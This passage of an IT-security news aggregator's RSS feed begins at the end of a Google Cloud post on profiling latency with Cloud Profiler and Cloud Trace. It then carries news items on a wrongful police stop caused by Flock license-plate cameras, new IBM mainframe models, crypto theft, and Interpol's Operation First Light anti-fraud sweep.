    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace_2_1.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace_2_1.max-1000x1000.jpg" alt="Using Cloud Profiler and Cloud Trace 2 (1).jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>These two Cloud Profiler views show the CPU time of the call stack increased from 457 milliseconds to 904 milliseconds, with most of the delta attributable to the <b>_UserStats_SellerCancelStats_Handler</b> function. But because other functions also saw variations in their CPU consumption, and because calls occurred in parallel, we found it difficult to identify the cause of latency increases. The fact that this function call was necessary meant we could not remove the entire function. </p><p>We checked Cloud Trace and confirmed the function call had increased overall latency on some requests, similar to below:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/trace_waterfall_view.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/trace_waterfall_view.max-1000x1000.jpg" alt="trace waterfall view.jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>We analyzed the service with Cloud Profiler and identified hot spots that were contributing to the increase in CPU time consumption. We optimized these hot functions, deployed the new code, used Cloud Profiler to verify that the changes had the desired effect of reducing the CPU time. Doing so, we were able to improve latency by 10% to 15%!</p><h3>Simplifying the DevOps experience</h3><p>Before adopting Cloud Profiler, profiling production services was a tedious and manual undertaking involving recompiling with debug flags; deployment to production environments, and using disparate  tools to collect profiles and perform analysis. Containerization only increased this complexity, further reducing developer productivity. </p><p>Cloud Profiler enables us to continuously profile production environments with small and simple code changes, replacing the tedious work previously required to set up environments for performance analysis. <a href="https://cloud.google.com/profiler/docs/about-profiler#performance_impact">Low overhead</a> continuous profiling with Cloud Profiler helps us react swiftly to changes in service performance by root causing and resolving issues quickly.</p><p>Further, tools such as Cloud Trace and Cloud Profiler require minimal effort to setup and provide a consistent DevOps experience for our service owners. This is particularly important as we grow in the United States and elsewhere. Without Google Cloud, monitoring, debugging and profiling across production environments that feature a mix of languages, technology stacks, frameworks and containers would be extremely challenging and time-consuming. The release of new features and experiences in tools such as Cloud Profiler make us glad we chose Google Cloud as our primary cloud platform. We will continue to work with new features and provide feedback to Google Cloud, so it can continue to provide a better service to users.  </p><p><i>Visit the Google Cloud website to learn more about <a href="https://cloud.google.com/profiler">Cloud Profiler</a> and <a href="https://cloud.google.com/trace">Cloud Trace</a>.</i></p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/topics/customers/mercari-relies-on-google-cloud-premium-support-and-technical-account-management/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Mercari: Faster and more efficient development with the help of Google Cloud</h4>
            <p class="uni-related-article-tout__body">Technical implementation can be challenging, and many businesses can benefit from hands-on support from their cloud provider. Learn how w...</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Flock Cameras Wrongly Tracked a Journalist for Days, Then Sent Police to Arrest Him]]></title>
<description><![CDATA["Are you armed?!" the police officer screamed. "Get out of the car!" 
A writer for the car-news site The Drive describes how "a technological chain linking surveillance cameras, AI, and law enforcement... led to me and my wife being surrounded by police, hands on their guns, in a Kohl's parking l...]]></description>
<link>https://tsecurity.de/de/3662018/it-security-nachrichten/how-flock-cameras-wrongly-tracked-a-journalist-for-days-then-sent-police-to-arrest-him/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662018/it-security-nachrichten/how-flock-cameras-wrongly-tracked-a-journalist-for-days-then-sent-police-to-arrest-him/</guid>
<pubDate>Sat, 11 Jul 2026 16:52:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Are you armed?!" the police officer screamed. "Get out of the car!" 
A writer for the car-news site The Drive describes how "a technological chain linking surveillance cameras, AI, and law enforcement... led to me and my wife being surrounded by police, hands on their guns, in a Kohl's parking lot in suburban Minnesota."


After dropping off our Amazon returns, we'd just gotten back in the Range Rover and reversed maybe two feet out of the spot when four cop cars came flying out of nowhere and boxed us in... The Plymouth Police Department had been tracking me for days using Flock license plate cameras, waiting for the right moment to strike, because they thought I'd stolen the Range Rover. And the reason I was ID'd as a dangerous car thief was a simple data error made 2,000 miles away in California, creating an edge case within an edge case that Flock's AI camera network was unable to handle... "The plates on this car are stolen," Officer Ganshyn said... 

This made absolutely no sense. Car companies keep meticulous track of the fleets they loan out to the media. The vehicles all have special manufacturer or dealer plates that are logged every time one enters or exits... The New Jersey plates that were allegedly stolen from the LA dealer were 34 03 DTM, not 34 10 DTM. But when the police report was created and the plate was entered into Flock's system, it was just recorded as 34 DTM. Just the five large characters, no little number in the middle... 

Flock's AI tech wasn't registering that non-standard little number when it began picking up the Range Rover around town... I connected the final dot. A lot of vehicles in [Range Rover manufacturer] JLR's media fleet have a New Jersey manufacturer plate with the same alphanumeric structure — 34 ## DTM — and Officer Ganshyn observed that meant it was now a nationwide issue. Anywhere a police department has a partnership with Flock, any other JLR-owned car with the same plate structure is going to get flagged as stolen. In fact, four other 34 ## DTM cars were being tracked around Minnesota that week, according to Officer Ganshyn. I was just the first one to get nabbed. 

The only way to stop it would be for the LAPD to correct their initial report and update Flock's system, which Jaguar Land Rover was now racing to make happen following the phone call. Still, he warned me to drive straight home, park the Range Rover, and leave it there. If I were to cross into the neighboring town, I'd probably get flagged again and go through this entire ordeal again with a different set of officers. His parting words were ominous: "You're lucky we're in Plymouth. If you were in Minneapolis, they definitely would've come at you with guns drawn." 
Ironically, even the original license plate wasn't stolen either, the article points out. It was reported misplaced during a Los Angeles photo shoot, and "The corporation had to report the plate as lost to law enforcement," according to the police report — and even then, the plate "was reported as NJ 34DTM instead of NJ 3403DTM." 
The author's conclusion? "Once these systems have you in their crosshairs, there's pretty much only one way it can go... A simple data-entry error, magnified and broadcast nationwide by a growing surveillance network operated through an opaque partnership between a private company and public agencies, led police to identify me as a car thief and set up a sting to take me down. I mean, they even had a drone flying overhead during the 'bust'... 

"Thank God our kids weren't with us." 


Thanks to long-time Slashdot reader sinij for sharing the article.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=How+Flock+Cameras+Wrongly+Tracked+a+Journalist+for+Days%2C+Then+Sent+Police+to+Arrest+Him%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F11%2F0556236%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F11%2F0556236%2Fhow-flock-cameras-wrongly-tracked-a-journalist-for-days-then-sent-police-to-arrest-him%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/11/0556236/how-flock-cameras-wrongly-tracked-a-journalist-for-days-then-sent-police-to-arrest-him?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM grows mainframe family with rack, frame models targeting AI, hybrid clouds]]></title>
<description><![CDATA[IBM is looking to expand the reach of its foundational mainframe portfolio by adding new single frame and rack mounted versions of its Z and LinuxONE systems.



The IBM z17 portfolio adds a single frame and rack mount versions that bring mainframe capabilities into smaller, customizable footprin...]]></description>
<link>https://tsecurity.de/de/3660589/it-security-nachrichten/ibm-grows-mainframe-family-with-rack-frame-models-targeting-ai-hybrid-clouds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660589/it-security-nachrichten/ibm-grows-mainframe-family-with-rack-frame-models-targeting-ai-hybrid-clouds/</guid>
<pubDate>Fri, 10 Jul 2026 20:23:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IBM is looking to expand the reach of its foundational mainframe portfolio by adding new single frame and rack mounted versions of its Z and LinuxONE systems.</p>



<p>The <a href="https://www.ibm.com/docs/en/announcements/z17-single-frame-rack-mount-systems-expand-ai-security-operational-simplicity-enterprise-workloads" target="_blank" rel="nofollow">IBM z17 portfolio</a> adds a single frame and rack mount versions that bring mainframe capabilities into smaller, customizable footprints. The <a href="https://www.ibm.com/docs/en/announcements/linuxone-rockhopper-5-built-secured-ai-ready-enterprise-it" target="_blank" rel="nofollow">LinuxONE Rockhopper family</a> gets a single frame and rack mount models, plus a new Express rack mount offering, that target new and smaller clients, according to Tina Tarquinio, chief product officer, IBM Z &amp; LinuxONE.</p>



<p>Specifically, the new hardware includes:</p>



<ul class="wp-block-list">
<li>z17 single frame is a fully packaged box in an IBM rack with intelligent power distribution units, delivered as a complete enclosed unit ready to deploy at the edge or other strategically important customer sites.</li>



<li>z17 rack mount lets customers install IBM Z components directly into their own industry-standard rack, with built-in flexibility for co-location with other technologies.</li>



<li>LinuxONE Rockhopper 5 is a multi-drawer LinuxONE system for high-density workloads, with on-chip AI acceleration, confidential computing, and postquantum cryptography available in both single frame and rack mount configurations.</li>



<li>Rockhopper 5 rack mount and Express offerings deliver enterprise-grade Linux, confidential computing, and on-chip AI acceleration in a compact 18U configuration. Designed for organizations supporting a smaller set of workloads, the offering provides a cost-efficient entry point that can scale as business grows, while prioritizing security, resiliency, and performance.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/LinuxONE-5-Single-Frame.png?w=1024" alt="IBM LinuxONE 5 single frame system" class="wp-image-4193838" width="1024" height="768" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">IBM</p></div>



<p>The new IBM z17 and IBM LinuxONE 5 Rockhopper configurations support up to 82 cores and 18 TB of memory across two processor drawers, representing about a 20% increase in core count and 12% increase in memory capacity over current systems, IBM stated. Single processor capacity of an IBM z17 ME2 provides full speed IBM z/OS configurations including 10% greater throughput per core than IBM z16 A02 with some variation based on workload and configuration, according to Tarquinio.</p>



<p>Both systems feature a 5.5 GHz IBM Telum II processor and a built-in AI accelerator that IBM says will let customers run more than 450 billion inferencing operations in a day with one millisecond response time. In addition, the 32-core Spyre AI accelerator is designed to handle all manner of AI workloads.</p>



<p>The idea is to bring the core strengths of IBM Z to a broader range of deployment models while offering the security, resilience, and performance enterprises depend on, Tarquinio said. </p>



<p>“As always, we’re continuing to innovate to deliver more with less, including up to 20% more capacity than IBM z16 to help process transactions faster and support growing AI-driven workloads,” Tarquinio said.  “Even the newest and smallest member of the IBM z17 family delivers the performance, efficiency, and scalability organizations need as they balance growth ambitions with real-world resource constraints.”</p>



<p>The Linux-based system, Rockhopper 5 is for organizations that have moved past the evaluation question and are ready to consolidate a substantial portion of their x86 estate, said Marcel Mitran, IBM Fellow and CTO of IBM LinuxONE. </p>



<p>Rockhopper 5 is designed to bring a smaller physical footprint and a software licensing model that reflects actual workload boundaries rather than physical server counts, Mitran said.</p>



<p>The LinuxONE 5 Express is a preconfigured system designed to get organizations running on LinuxONE quickly, with a defined bill of materials and a predictable starting cost, on the same architecture that the largest enterprises in the world depend on, Mitran said.</p>



<p>“It is built for organizations that want to consolidate a modest x86 estate, evaluate LinuxONE for the first time, or deploy a specific workload such as digital assets, AI-infused transaction processing, or confidential computing, without committing to the footprint of the larger model,” Mitran said.</p>



<p>Some of the mainframes’ software features were also bulked up. For example, IBM said that Post Quantum Cryptography security is now standard on the z17 and LinuxONE Rockhopper 5 systems letting customers start to utilize cryptography to protect core resources for the future.</p>



<p>The idea is to help customers protect long-lived, mission-critical data while reducing the cost and complexity of future cryptographic migration, IBM stated. </p>



<p>In that vein, IBM said it was bringing Crypto Discovery &amp; Inventory, which lets security teams see what has been encrypted across the enterprise. In addition, IBM announced an Infrastructure Management for Z and LinuxONE package that would let customers administer, monitor, automate, and provision IBM Z and LinuxONE systems from a central location.</p>



<p>IBM said it wants to reduce operational complexity for customers by making automating day-to-day operations<strong> </strong>to ultimately lower administrative costs and concerns. With the new flexible form factors, IBM continues to target hybrid and AI infrastructure buildouts with the Big Iron. In the AI world, the z17 is being utilized for AI inferencing, transactions, training, and key security applications such as fraud detection and insurance claims.</p>



<p>“Enterprise infrastructure is entering a new phase. Organizations need platforms that can support AI-driven growth while navigating resource constraints, evolving business requirements, and increasingly complex hybrid environments,” Tarquinio said. “They are being asked to deploy new AI capabilities while learning new skills, controlling operational costs, and maximizing the value of existing applications and infrastructure.”</p>



<p>A recent <a href="https://www-api.ibm.com/adobe/assets/urn:aaid:aem:52bed780-53cf-4a1c-a73b-d373bd532e97/original/as/the-mainframe-advantage.pdf" target="_blank" rel="nofollow">IBM Institute study</a> on mainframe usage stated that embedding mainframe to support AI in executing transactions is not temporary: 75% of executives expect mainframe-based applications to remain central to digital transformation, and 60% say mainframe-based platforms are essential to enabling AI innovation.</p>



<p>”Mainframe-anchored systems of record are becoming systems of intelligent execution—not as general‑purpose AI platforms, but as environments where AI acts directly within transactions and in support of them,” the study reported.</p>



<p>Gartner wrote in its “<a href="https://www.ibm.com/forms/mkt-17256" target="_blank" rel="nofollow">The State of the IBM Mainframe in 2026</a>” report that IBM’s willingness to make significant investments ensure the mainframe modernizes to remain a vital and thriving component of enterprise IT.  </p>



<p>“Most mainframe customers are now prioritizing the reduction of technical debt and adopting platform innovations to future-proof their mainframe environments for the coming decade,” Gartner wrote.</p>



<p>The new z17 single frame and rack mount configurations, LinuxONE Rockhopper 5, and LinuxONE 5 Express will all be available August 12, 2026. IBM Infrastructure Management for IBM Z and IBM LinuxONE will be available August 14.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Money launderer accused of stealing seized crypto while in prison]]></title>
<description><![CDATA[A Bulgarian national has been charged with stealing $290,000 in government-seized cryptocurrency while serving 121 months in prison for helping launder millions stolen from American fraud victims. [...]]]></description>
<link>https://tsecurity.de/de/3660222/it-security-nachrichten/money-launderer-accused-of-stealing-seized-crypto-while-in-prison/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660222/it-security-nachrichten/money-launderer-accused-of-stealing-seized-crypto-while-in-prison/</guid>
<pubDate>Fri, 10 Jul 2026 17:40:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Bulgarian national has been charged with stealing $290,000 in government-seized cryptocurrency while serving 121 months in prison for helping launder millions stolen from American fraud victims. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[$293 million seized and 5,811 arrests made in huge anti-scam and fraud action by Interpol and law enforcement agencies across 97 countries]]></title>
<description><![CDATA[After more than three months, Interpol says Operation First Light 2026 is now concluded.]]></description>
<link>https://tsecurity.de/de/3660152/it-nachrichten/293-million-seized-and-5811-arrests-made-in-huge-anti-scam-and-fraud-action-by-interpol-and-law-enforcement-agencies-across-97-countries/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660152/it-nachrichten/293-million-seized-and-5811-arrests-made-in-huge-anti-scam-and-fraud-action-by-interpol-and-law-enforcement-agencies-across-97-countries/</guid>
<pubDate>Fri, 10 Jul 2026 17:03:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After more than three months, Interpol says Operation First Light 2026 is now concluded.]]></content:encoded>
</item>
<item>
<title><![CDATA[Interpol’s global fraud sweep, China’s Claude Code flag, old Github account tricks]]></title>
<description><![CDATA[Interpol’s fraud sweep goes global China flags Claude Code Old GitHub accounts, new tricks Get the show notes here: https://cisoseries.com/cybersecurity-news-interpols-global-fraud-sweep-chinas-claude-code-flag-old-github-account-tricks/ Thanks to our episode sponsor, Vanta Your team just added i...]]></description>
<link>https://tsecurity.de/de/3658993/it-security-nachrichten/interpols-global-fraud-sweep-chinas-claude-code-flag-old-github-account-tricks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658993/it-security-nachrichten/interpols-global-fraud-sweep-chinas-claude-code-flag-old-github-account-tricks/</guid>
<pubDate>Fri, 10 Jul 2026 09:35:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Interpol’s fraud sweep goes global China flags Claude Code Old GitHub accounts, new tricks Get the show notes here: https://cisoseries.com/cybersecurity-news-interpols-global-fraud-sweep-chinas-claude-code-flag-old-github-account-tricks/ Thanks to our episode sponsor, Vanta Your team just added its 67th AI tool. And unfortunately, also your 67th security…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/interpols-global-fraud-sweep-chinas-claude-code-flag-old-github-account-tricks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/interpols-global-fraud-sweep-chinas-claude-code-flag-old-github-account-tricks/">Interpol’s global fraud sweep, China’s Claude Code flag, old Github account tricks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay: Cloud Bucket Hijacking, Windows LPE Chain, Global Fraud Bust + 17 More Stories]]></title>
<description><![CDATA[Ravie LakshmananJul 09, 2026Hacking News / Cybersecurity News Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it. This week is full of that kind of damage. Not loud. Not clever. Jus...]]></description>
<link>https://tsecurity.de/de/3658599/it-security-nachrichten/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658599/it-security-nachrichten/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/</guid>
<pubDate>Fri, 10 Jul 2026 05:22:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ravie LakshmananJul 09, 2026Hacking News / Cybersecurity News Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it. This week is full of that kind of damage. Not loud. Not clever. Just small gaps doing big […]]]></content:encoded>
</item>
<item>
<title><![CDATA[INTERPOL Operation First Light Nets 5,811 Arrests and Seizes $293 Million]]></title>
<description><![CDATA[INTERPOL’s Operation First Light 2026 led to 5,811 arrests, blocked $293M in criminal assets, and disrupted global fraud and money laundering networks. INTERPOL coordinated a four-month operation across 97 countries and territories that ended with 5,811 arrests and the interception…
Read more →
T...]]></description>
<link>https://tsecurity.de/de/3658355/it-security-nachrichten/interpol-operation-first-light-nets-5811-arrests-and-seizes-293-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658355/it-security-nachrichten/interpol-operation-first-light-nets-5811-arrests-and-seizes-293-million/</guid>
<pubDate>Fri, 10 Jul 2026 00:23:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>INTERPOL’s Operation First Light 2026 led to 5,811 arrests, blocked $293M in criminal assets, and disrupted global fraud and money laundering networks. INTERPOL coordinated a four-month operation across 97 countries and territories that ended with 5,811 arrests and the interception…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/interpol-operation-first-light-nets-5811-arrests-and-seizes-293-million/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/interpol-operation-first-light-nets-5811-arrests-and-seizes-293-million/">INTERPOL Operation First Light Nets 5,811 Arrests and Seizes $293 Million</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[INTERPOL Operation First Light Nets 5,811 Arrests and Seizes $293 Million]]></title>
<description><![CDATA[INTERPOL’s Operation First Light 2026 led to 5,811 arrests, blocked $293M in criminal assets, and disrupted global fraud and money laundering networks. INTERPOL coordinated a four-month operation across 97 countries and territories that ended with 5,811 arrests and the interception of USD 293 mil...]]></description>
<link>https://tsecurity.de/de/3658340/it-security-nachrichten/interpol-operation-first-light-nets-5811-arrests-and-seizes-293-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658340/it-security-nachrichten/interpol-operation-first-light-nets-5811-arrests-and-seizes-293-million/</guid>
<pubDate>Fri, 10 Jul 2026 00:05:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[INTERPOL’s Operation First Light 2026 led to 5,811 arrests, blocked $293M in criminal assets, and disrupted global fraud and money laundering networks. INTERPOL coordinated a four-month operation across 97 countries and territories that ended with 5,811 arrests and the interception of USD 293 million in illicit assets. Operation First Light 2026 ran from January 15 […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Who you gonna call?]]></title>
<description><![CDATA[GhostApproval puts AI coding assistants under the microscope. Microsoft fixes the RoguePlanet zero-day. More than 70 cybersecurity firms back a new AI Charter. An Ohio county may have paid a $1 million ransom. AssuranceAmerica discloses a breach affecting nearly seven million people. Australia br...]]></description>
<link>https://tsecurity.de/de/3658216/it-security-nachrichten/who-you-gonna-call/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658216/it-security-nachrichten/who-you-gonna-call/</guid>
<pubDate>Thu, 09 Jul 2026 22:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GhostApproval puts AI coding assistants under the microscope. Microsoft fixes the RoguePlanet zero-day. More than 70 cybersecurity firms back a new AI Charter. An Ohio county may have paid a $1 million ransom. AssuranceAmerica discloses a breach affecting nearly seven million people. Australia bricks thousands of broadband routers. Israeli fintech Nayax reports a cyber incident. KDDI confirms a massive telecom data breach. A global anti-fraud operation leads to thousands of arrests. Ben Yelin from University of Maryland Center for Cyber Health and Hazard Strategies explains the EU Cloud and AI Development Act. Slopfix fights fire with fire.]]></content:encoded>
</item>
<item>
<title><![CDATA[Interpol cybercrime crackdown nets 5,800 arrests across 97 countries]]></title>
<description><![CDATA[The anti-fraud crackdown, dubbed Operation First Light, identified more than 142,000 victims of various social-engineering scams.
The post Interpol cybercrime crackdown nets 5,800 arrests across 97 countries appeared first on CyberScoop.]]></description>
<link>https://tsecurity.de/de/3657878/it-security-nachrichten/interpol-cybercrime-crackdown-nets-5800-arrests-across-97-countries/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657878/it-security-nachrichten/interpol-cybercrime-crackdown-nets-5800-arrests-across-97-countries/</guid>
<pubDate>Thu, 09 Jul 2026 19:37:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The anti-fraud crackdown, dubbed Operation First Light, identified more than 142,000 victims of various social-engineering scams.</p>
<p>The post <a href="https://cyberscoop.com/interpol-cybercrime-crackdown-operation-first-light/">Interpol cybercrime crackdown nets 5,800 arrests across 97 countries</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay: Cloud Bucket Hijacking, Windows LPE Chain, Global Fraud Bust + 17 More Stories]]></title>
<description><![CDATA[Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it. This week is full of that kind of damage. Not loud.…
Read more →
The post ThreatsDay: Cloud Bucket Hijacking, Windows LPE Chain, Gl...]]></description>
<link>https://tsecurity.de/de/3657875/it-security-nachrichten/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657875/it-security-nachrichten/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/</guid>
<pubDate>Thu, 09 Jul 2026 19:37:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it. This week is full of that kind of damage. Not loud.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/">ThreatsDay: Cloud Bucket Hijacking, Windows LPE Chain, Global Fraud Bust + 17 More Stories</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay: Cloud Bucket Hijacking, Windows LPE Chain, Global Fraud Bust + 17 More Stories]]></title>
<description><![CDATA[Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it.

This week is full of that kind of damage. Not loud. Not clever. Just small gaps doing big jobs. The worst part is how normal it al...]]></description>
<link>https://tsecurity.de/de/3657814/it-security-nachrichten/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657814/it-security-nachrichten/threatsday-cloud-bucket-hijacking-windows-lpe-chain-global-fraud-bust-17-more-stories/</guid>
<pubDate>Thu, 09 Jul 2026 19:08:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it.

This week is full of that kind of damage. Not loud. Not clever. Just small gaps doing big jobs. The worst part is how normal it all looks until the bill arrives.

The full ThreatsDay list is below.





  

  
  
    Global]]></content:encoded>
</item>
<item>
<title><![CDATA[The top 6 back-to-school mini PCs for college and university — as benchmarked by our computing team (and no, they won't wipe out your student loan either)]]></title>
<description><![CDATA[Power up for the school year.]]></description>
<link>https://tsecurity.de/de/3657792/it-nachrichten/the-top-6-back-to-school-mini-pcs-for-college-and-university-as-benchmarked-by-our-computing-team-and-no-they-wont-wipe-out-your-student-loan-either/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657792/it-nachrichten/the-top-6-back-to-school-mini-pcs-for-college-and-university-as-benchmarked-by-our-computing-team-and-no-they-wont-wipe-out-your-student-loan-either/</guid>
<pubDate>Thu, 09 Jul 2026 19:02:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Power up for the school year.]]></content:encoded>
</item>
<item>
<title><![CDATA[Block reaches $45M settlement with 46 states over Cash App fraud probe]]></title>
<description><![CDATA[State attorneys general said they found that Block misled users by falsely advertising that Cash App provided bank-like protections, including advanced fraud detection.]]></description>
<link>https://tsecurity.de/de/3657486/it-nachrichten/block-reaches-45m-settlement-with-46-states-over-cash-app-fraud-probe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657486/it-nachrichten/block-reaches-45m-settlement-with-46-states-over-cash-app-fraud-probe/</guid>
<pubDate>Thu, 09 Jul 2026 17:17:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[State attorneys general said they found that Block misled users by falsely advertising that Cash App provided bank-like protections, including advanced fraud detection.]]></content:encoded>
</item>
<item>
<title><![CDATA[=CEO Fraud – Millionen verloren - YouTube]]></title>
<description><![CDATA[Go to channel Hacking Modern Life · The Flipper One is Finally Here (And It's Huge). Hacking Modern Life•722K views · 12:12.]]></description>
<link>https://tsecurity.de/de/3657471/hacking/ceo-fraud-millionen-verloren-youtube/</link>
